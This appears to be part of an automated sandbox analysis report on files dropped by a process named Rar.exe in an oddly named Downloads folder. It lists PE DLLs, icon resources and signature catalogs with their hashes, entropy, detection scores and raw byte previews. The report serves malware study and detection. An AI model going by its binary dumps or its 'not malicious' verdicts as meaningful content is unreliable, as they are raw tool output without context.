                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):69912
                                                                                                                                                                                      Entropy (8bit):6.7529275237414
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:XAqVY6E4oksA1MT9f8+CeJ+8WyKTVVILLwt7SyJPxl:XAqVY3FA1MT9f8DeJ+8W9TVVILLwtvxl
                                                                                                                                                                                      MD5:A092B2DE9E1128F73E26D142A5B2D68B
                                                                                                                                                                                      SHA1:0C5E38B11389ACC870056200710F4152FBB03429
                                                                                                                                                                                      SHA-256:389D2B94A3562879F9E0A17CACE1574EE308AC39A5D9F5659F885284C9B2D19E
                                                                                                                                                                                      SHA-512:60D45D3BEF3C8729CA879816A321B8508AE304A84499E715CB2AD7352273A6482B82C960092311E3EF40F1326D6533CE25B61953A197F7D3FBCE2C0CF511D5E2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...k...f...0.`...0.n...0.h...0.c.....`...b......)...e.....c.....c.....j.c.....c...Richb...................PE..L...n.,d...........!.....f...|......tk....................................................@.........................P...P................................/..............T........................... ...@............................................text...:e.......f.................. ..`.rdata...Z.......\...j..............@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):72984
                                                                                                                                                                                      Entropy (8bit):6.755617527508713
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:a85mWPlKtIGSqpnoOUNGHxvttnGyOuPrF2dRILOQxyO7Syo/PxjP:XmdiHqpjmGx1tnGEzF2dRILOQxheHxD
                                                                                                                                                                                      MD5:389A85E60B7DA2F29AAA738A7BF2B542
                                                                                                                                                                                      SHA1:4C6F51FD4C25F22474667AB8078AD974A9628C5D
                                                                                                                                                                                      SHA-256:8A703DA286CDBC263FE28D0888C03BB899E73B4B7729C44A953CC6139F33E3BE
                                                                                                                                                                                      SHA-512:898506A70DA25E8D181DF7E7790430ABEFCB0C9EECCB0595A1983CE09B6155DD0C72935470FBB9EF0BFA0BFFC953555693FF2FFA2461C10B84578691CD0C7B50
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@..s!.]s!.]s!.]zY.]u!.]!T.\q!.].Ny]r!.]!T.\.!.]!T.\y!.]!T.\r!.].T.\v!.]8Y.\q!.]s!.].!.].T.\z!.].T.\r!.].T{]r!.].T.\r!.]Richs!.]........PE..L.....,d...........!.........n.......................................................I....@.........................P...P................................/......8.......T...............................@............................................text....~.......................... ..`.rdata...E.......F..................@..@.data...L...........................@....rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):141592
                                                                                                                                                                                      Entropy (8bit):6.519132347042123
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Q1ixmpACRnjX8bpl/u3O90wxY77N5ILC792oywBxv:4ixmpPsbppu3zwxWN9b
                                                                                                                                                                                      MD5:1222DAA5C49F53A36D2843CA9BFE513A
                                                                                                                                                                                      SHA1:7A43E326B261E75A05CDFA979B80E95B69080173
                                                                                                                                                                                      SHA-256:69C76B8FE5C873D1A0DFF493C3A3B88090B61EE648AD7681BC0581964465589E
                                                                                                                                                                                      SHA-512:B5BF384D14C3C8221A42288F97D910491730C84BE0A783F5BD17FC2E3DF7F2BB63529571C97CB08064066AA90F07FA00C837944E43DB62E071089A720A8BB551
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_...>...>...>...F-..>...K...>...K...>...K...>...K...>..=K...>..8B...>...>..r?...F...>..=K...>..=K...>..=KA..>..=K...>..Rich.>..........................PE..L...~.,d...........!.........L......t........................................ .......P....@..........................q..d...4r.........................../..........Pm..T............................m..@...............,............................text............................... ..`.rdata..............................@..@.data....J.......H..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):22808
                                                                                                                                                                                      Entropy (8bit):6.937211239543495
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:vqIesePwjnE8Gtr5ILZwkeHQIYiSy1pCQiI/NPxh8E9VF0Nyn54qSc:CIeZkgr5ILZwkU5YiSyvT/NPxWElQc
                                                                                                                                                                                      MD5:59F19A807B3E13D8E707C942A38BF84E
                                                                                                                                                                                      SHA1:469DEC6DA89737795C72FF51F69B44462E55099A
                                                                                                                                                                                      SHA-256:7ED17311B391FFFF58F073ECF71829F73629033458A54A435DC62014281A733C
                                                                                                                                                                                      SHA-512:3C10A7B3AF03E1AE95C577FB4FEE108D0ACFF876DFE0FD1079F74DE30881B5F3659AAA1F52A857CEC9C7430248094E896261C297A25C62D4951252A3A74EB48A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:...:...:...B'..:...O...:...O...:...O...:...O...:...O...:...B...:...:...:...O...:...O...:...OK..:...O...:..Rich.:..................PE..L...M.,d...........!......................... ...............................`......5.....@..........................%..L....%..x....@...............*.../...P..l.... ..T...........................H!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..l....P.......(..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):39192
                                                                                                                                                                                      Entropy (8bit):6.848342556185962
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:64mK0kiN79J9M3MMc0U2cLbEMRIL9XbR5YiSyvQydPxWEaQK:6rN9JAU9bEMRIL9X77Sy4WPxdK
                                                                                                                                                                                      MD5:3737DA6429A20AF06F34F307C5611E1C
                                                                                                                                                                                      SHA1:5FF4FBF0C655DFF7EADBA5FBEBDC2C889003F869
                                                                                                                                                                                      SHA-256:FCD5C9C9131113354ACEB5A9ED26C75EA7DDC9B44DDC4286A1EFFFC1E3EE4D55
                                                                                                                                                                                      SHA-512:BF6C94331E8A84302DA2F0AB765B2F44E3EA69A1472689498F1A6D67451B58A944505B63C607F9004A1B91FB3221CE2FB2FD6F1FA088128057596D762A189ACB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./..tA..tA..tA......tA..@..tA..D..tA..E..tA..B..tA.=.@..tA..@..tA..t@.tA.=.I..tA.=.A..tA.=....tA.=.C..tA.Rich.tA.........................PE..L...:.,d...........!.....:...........?.......P............................................@..........................]..T....]..x....................j.../......x....X..T...........................PY..@............P..L............................text....9.......:.................. ..`.rdata..f....P.......>..............@..@.data........p.......V..............@....rsrc................Z..............@..@.reloc..x............d..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2276120
                                                                                                                                                                                      Entropy (8bit):6.111762453951637
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:49152:3L7Iy5xntVyJSFtv3A8+QK1CPwDv3uFfJKShr:3L7Iy59nFdA8m1CPwDv3uFfJK+
                                                                                                                                                                                      MD5:4633D62F19C0B25318B1C612995F5C21
                                                                                                                                                                                      SHA1:50601F9E2B07D616FDE8EE387CE8CDCB0CA451DF
                                                                                                                                                                                      SHA-256:47376D247AE6033BC30FEE4E52043D3762C1C0C177E3EC27CA46EFF4B95C69B0
                                                                                                                                                                                      SHA-512:D6A18E43B1A20242F80265054ED8D33598439FFA5DF4920931FF43EC91F1AC2D8A3931913FD5569F48C9B1B9EA845D9E017EA23571A1AC1B352502A3E823ECA9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..uk..uk..uk...k..uk..tj..uk..pj..uk..qj..uk..vj..uk..tko.uk..tj..uk2.qjs.uk2.uj..uk2..k..uk2.wj..ukRich..uk........PE..L......c...........!...".(...........g.......@................................#.....8."...@.........................`....h....!.T.....".|............."../....".4.......8...............................@.............!..............................text....&.......(.................. ..`.rdata..v*...@...,...,..............@..@.data...TY...p!......X!.............@....idata........!......n!.............@..@.00cfg........!.......!.............@..@.rsrc...|.....".......!.............@..@.reloc........".......!.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29208
                                                                                                                                                                                      Entropy (8bit):6.643623418348
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                                                                      MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                                                                      SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                                                                      SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                                                                      SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):552216
                                                                                                                                                                                      Entropy (8bit):5.779566253639773
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:MaYPTKwDsuz9V/9SYeujF59CF5e3SnEEATLU2lvzS7u:nYPTRDD9ND58GqbATLU2lvzS7u
                                                                                                                                                                                      MD5:8845FCF1AE2DE1018DAAAEA01D9BA2D5
                                                                                                                                                                                      SHA1:DB67697EE052738E6F23CC1D29B261BEF1D423E5
                                                                                                                                                                                      SHA-256:B7E16AF3EFF9AB0869CFE60C256394A70A867879B7F56544A724D6AC1CCFAB88
                                                                                                                                                                                      SHA-512:2792FE94DD35B594514C4FAD091C9683EC47814335D046F776CD1F043C576533E99088949F1F1AE6814C16DBDDA430EC53B2D64621EA0C818CADB91EC5E3A788
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x.._x.._x.._qf._t.._7b.^z.._3f.^z.._7b.^s.._7b.^r.._7b.^z.._.b.^{.._x.._..._.b.^T.._.b.^y.._.ba_y.._.b.^y.._Richx.._........................PE..L......c...........!...".....4......."....... ......................................P.....@......................... =...N...........0..s............>.../...@...6...,..8............................+..@............................................text...-........................... ..`.rdata..*k... ...l..................@..@.data....;.......6...|..............@....idata..dA.......B..................@..@.00cfg....... ......................@..@.rsrc...s....0......................@..@.reloc..)>...@...@..................@..B........................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):75809
                                                                                                                                                                                      Entropy (8bit):5.969322217946821
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:+sNNRmOha6UEm3BL61Z4tXSZ6HTk1FaA87Gl6L:+2No6UtB+1eJ9Z
                                                                                                                                                                                      MD5:B35F68A3086562C4D5453FAAD5A3474E
                                                                                                                                                                                      SHA1:673904FF9B305A6600E47AD715289122EC0B046A
                                                                                                                                                                                      SHA-256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
                                                                                                                                                                                      SHA-512:6EC80921942B3BD3C85EF24A2DE5454A34A3AD11A1BC69B601AEA7B873E318073C0B2D78C26685999F78EC64A86282C08C53AB8D77E41C661AE968EA52C08176
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...............7......@@......(....8..00...........N.. ..........m]...............f..........h....l........ .t/..Er..@@.... .(B......00.... ..%...... .... ............... .....1......... .h....#...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..{.$.}....w........X..V.....F..]..T..P.H().........P)..<....Y..%%...[B2....2."..\......tOwO..9=.>}^=.5s.....==gz......;..;.T.x..0.3.x.....,.l..f.a..0......`..0.....a&.6..3...`......L0l..f.a..0......`..0.....a&.6..3........_.ro...Y:>.T...V...0c.......3v..X8..0c...56.....f,.t:..,.l....#......k8...l....G..1.u.6..n....5.......w.{...N..ND.\'P.......j...1.!.u+n..v|.._... ..>.....p.....}.v.y.h6...N...%`....[.l....F`.a.....og#....`..6.....f.`#.p..`..6.....fla#0...0c....q.m.9..{......3.\v.e....>}......."...p..w8E.l....`V..........H..l....e.]..~..Nm'....`V$.v..G?.Q...l...0+.6.v..0+.6.f..0+.6.z..0...].........q...O..`..L..w.v6......#....(...a..L.l....`&.6.)+~Y.........aY.{.r?..{.n.....{..F...o\QK.s..L47.p
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):78396
                                                                                                                                                                                      Entropy (8bit):6.10453452748711
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:WNXYu6xYBxqjlETx2UjHe20dH397tiKZoZa1ABtc8Yg2zR51ZV2vL2inK/fR1:sayx2lETxN+HTo8+bil1ZqdKX
                                                                                                                                                                                      MD5:B1C9980131A3F20E344AA3AA2C8DEA49
                                                                                                                                                                                      SHA1:0FE02F0ED5E56BBE7E4E98B1DCA061ED17FBF5C7
                                                                                                                                                                                      SHA-256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
                                                                                                                                                                                      SHA-512:84CA107ACE44FA1964C6C1EA93FC767BDE88363339FC426A3D660DA53C84BADE14F1FAE99C494483BF2B5312938D84B0C1733C85E82592B8FFE8A28F76186A3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..............r?......@@......(...8@..00..........`V.. ...........e...............m..........h...xt........ ..1...y..@@.... .(B.....00.... ..%...... .... ............... .....L$........ .h....-...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..W}..-.^....n.v.lK..@.../.,....`...s0g.@.0.d...8.@B&..9.'.@L....NX-..-.8v[.. ./-....zU..[..[.....w?...zU...[.-......=..#.h4..1./..h....4..F+......@..`...h:...4..F+......@..`...h:...4..F+......@..`...h:...4..F+.....O......x.9..:...t..lB{...B+..E+.M.....j%0Ah..i;,........m.....@.hO`.h..i{.'0v...=.ei%0F.. .C..M.+..<....w..d..~g&.j.*.y.uQ.T`Y..:....w.:.......y.t.BH.w.}.....v..#X.x1.....$0..F....8..<J.R.z8..Z.h....&...4m..'P.V3]..@6...........J ...4m.V...V...D+..A+.M.r.....j% F+.M[s.....Z...}.{Z.....=L.dI..9sF{....4......V.2.'....f.=....@3.h...t%...f.q...L^....Z.hf%.......3g:V.h....h%..V..Y.V.j....z.......#.J@.V...A+.$Z.h:...A,\.0.......t.........@3&fz..4.p..c....w.......\c.].g.....o...n....m.6.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):83351
                                                                                                                                                                                      Entropy (8bit):6.269678824341842
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:fVLhV30CuzZO5Wf/DGsea4SNum23KXVDTEhr:f1hV3Uz447lea4muXG1TEhr
                                                                                                                                                                                      MD5:1A8230030D821CF8EA57CE03AAEAD737
                                                                                                                                                                                      SHA1:12656788B1FBE4D2375ECC2989A4D9DA69CAA0D6
                                                                                                                                                                                      SHA-256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
                                                                                                                                                                                      SHA-512:AF6356DC67249E724AE30F65DDEFB4E53C6F2703DA32FD5F135598BBD6189BEE70950242F52985478DE99979D1271EEC9F4E2981A29A9BC02C673E9B668FD0C1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:...............H......@@......(....I..00..........._.. ..........hn...............w..........h....}........ ..;..@...@@.... .(B../...00.... ..%..W... .... ......&........ ......7........ .h.../A...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y...u.....u..l3..+Ar...)B..-.c...Y....X.$[....r..c.;>I..>..(...X.m%..G... ..H.....F,..f....~.T..W.^U...Yz.}.S....5.|....S^z.%H$...7 .H..i.$.e.4...2F...d.#..D....@"Y.H. .,c...H.1..H$..i.$.e.4...2F...d.#..D....@"Y.H. .,c...........B.d~H....G>.,.},%d. i......H. i9../.R..&!....0.C..&!...%.F.9H. iY...=..HZ.i.f.4...G...i.:.8....-..9.m..y>.G.\...x...~......O."......0".#F@..$c...B>.l&M=...........qm?>.K..?...azz:.Zi..#...E...../..t:.{...$C..IK0.n...._FGGG....#...e.\7......@...@.Rl...../J#.$.....[6..'_.9.f ...%..@s..@..H`.H. ii.l.......5.._..W.....@.......D....F.B...@....@.d.F 9..H.....$.....@...u3>.S...vzz..........@.$yx..~.g...w..Y.F@...E..x...,i...F...G..p...,...=.....f......@.lx..'..~H...b....,+.~.I|.#?.t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):170264
                                                                                                                                                                                      Entropy (8bit):6.693484567356425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:M5QtHVOqzYcylPwZzS8JqTuo0BmSWjIuVBY/xux08YvVILLh8ptCuX5x+:M2tHjzYcyu+unESWXA/xaYvD0
                                                                                                                                                                                      MD5:92C72753FA5C8EAA615B007F89CDB482
                                                                                                                                                                                      SHA1:34238E31E0D963838FF551B184EAB3267767AD12
                                                                                                                                                                                      SHA-256:EBBDE07AFB2BB356CD400E97D8AFB5ABBC121CC0CC90F99BEC9C3FA5CA60DE14
                                                                                                                                                                                      SHA-512:A80BBA7095E7178591266E411414B3A6A2CBA09B79F330631AC07A72C6EB2AFD1C50D7346938ED337A911307B15660C17D14FACC7AFC6EFD9759BFBEC2121BD6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i^C.-?-.-?-.-?-.$G..#?-..J,./?-..J(.!?-..J).'?-..J../?-..J,./?-.fG,..?-.-?,._?-..J%.)?-..J-.,?-..J..,?-..J/.,?-.Rich-?-.........PE..L...M.,d...........!......................................................................@..........................:..P...`:.......p...............j.../......( ...5..T............................5..@............................................text............................... ..`.rdata...U.......V..................@..@.data........P.......2..............@....rsrc........p.......>..............@..@.reloc..( ......."...H..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):162444
                                                                                                                                                                                      Entropy (8bit):6.899798696437328
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:t01xIh2ISDWCMiVQwmXWFRlbIMWa1PhWkRtjNsj2+1/L3kr7Sy5Pxy:t0HIcI7C/ZIWVbZhWijNsjxkrvxy
                                                                                                                                                                                      MD5:830E831E1896D35A5E414D518AC05A2B
                                                                                                                                                                                      SHA1:D43B639FA1D0614EE40A85483998ED7C4996AB19
                                                                                                                                                                                      SHA-256:739B93F1ABFD7E6188F0C86172E526DAD72E29E0FC177E4B8C4E3686DD90AE9B
                                                                                                                                                                                      SHA-512:81FD4E1E2D376262B9F0C235EA817ECD608FE3B734CA25715BA64E33D831A330DDE5D68C3F821C540B442727D3B008103E584E6CC91DACBA6F17C0D31A7CF4C8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:0..z...*.H.........zw0..zr...1.0...`.H.e......0..K...+.....7.....K.0..K.0...+.....7.....].GkN..D.n...]....230405005111Z0...+.....7.....0..K.0*......T...Q...w.Z...g.1.0...+.....7...1...0... ....%...%......*.].4i,`..(...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ....%...%......*.].4i,`..(...0*....T..|../..IT....Q.1.0...+.....7...1...0*.....'......s..%R=5..1.0...+.....7...1...0*.....K..`....T...#\.1.0...+.....7...1...0*.....2m..3.......N..D1.0...+.....7...1...0... .......V.C.........>..wf...O...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .......V.C.........>..wf...O...0*.....KG{6.8.o.<v.....1.0...+.....7...1...0*...7.d3t.[....Fh....!1.0...+.....7...1...0... .k.r.....r...K=.w.&.....mY+..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .k.r.....r...K=.w.&.....mY+..0... .l..x....h......=....'&.ZZGe.7.31i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .l..x...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31213
                                                                                                                                                                                      Entropy (8bit):7.250253600675095
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:e+Obmujt2xtYZtMPgs+03HQIYiSy1pCQAGy+Pxh8E9VF0NyOXz0:eE0tQYYPf5YiSyvny+PxWEUQ
                                                                                                                                                                                      MD5:E33C9E857AD27ADBE33B26AB13890657
                                                                                                                                                                                      SHA1:D70E576009A35D201399059DBE6DEAC35E1AC168
                                                                                                                                                                                      SHA-256:EDE0345311D5D825BA03E10423CF51515B3F3962F1286E46E1E6198ADFEC67CF
                                                                                                                                                                                      SHA-512:AC370602AC8E55E5B524AC5E961CC5185978AE8532A29F24B6F806E3355530C3F67127AC2F65FE4849AC8B354DE7D1102B8E11FB3C5457A5548B1125209FE913
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:0.y...*.H........y.0.y....1.0...`.H.e......0.K>..+.....7....K/0.K+0...+.....7.....1..4.&N....XE...230405005423Z0...+.....7.....0.J.0*......n)z;.....n7...1.0...+.....7...1...0... ..ok..m.e,W=:a.VS...<....v.L..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..ok..m.e,W=:a.VS...<....v.L..0... ..7]Y....M..u...8..([M.A...}...91i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..7]Y....M..u...8..([M.A...}...90*....[2j[...kSR.V....81.0...+.....7...1...0... ...F....(.jg.cc]..<.t.1..a.&c\..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ...F....(.jg.cc]..<.t.1..a.&c\..0... ..d...m..'...n.L!...>..S.sU.g.1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..d...m..'...n.L!...>..S.sU.g.0... ..?..."`...^.M..|...D.....@C....1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..?..."`...^.M..|...D.....@C....0*.....v.ow......6:.ZGU,1.0...+.....7...1...0... ..#|.!+.Hy
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):27416
                                                                                                                                                                                      Entropy (8bit):6.835600420682668
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:+WFXERsAnq2NWow4VILQGR5YiSyvLPxWEa0P+:+xqwWow4VILQGf7SyzPx+
                                                                                                                                                                                      MD5:6EBA3E39E61C839818F502BD67BBD672
                                                                                                                                                                                      SHA1:CD724D843CA57F6EDBBBE94B3C352769F70AED65
                                                                                                                                                                                      SHA-256:C942F16C17687E988434813E50D2FB222C528D0E56CCF2D15B13104676F93FC9
                                                                                                                                                                                      SHA-512:8614F4DBF7DF68D66BA611B31135EB35EF5C6D24E1C3F3EC4E8DF67BE75102DA991F26FEA76EF930B686A1ED08AD4A4C5F62CB2BEA4233B26D276FFD3C54FC31
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
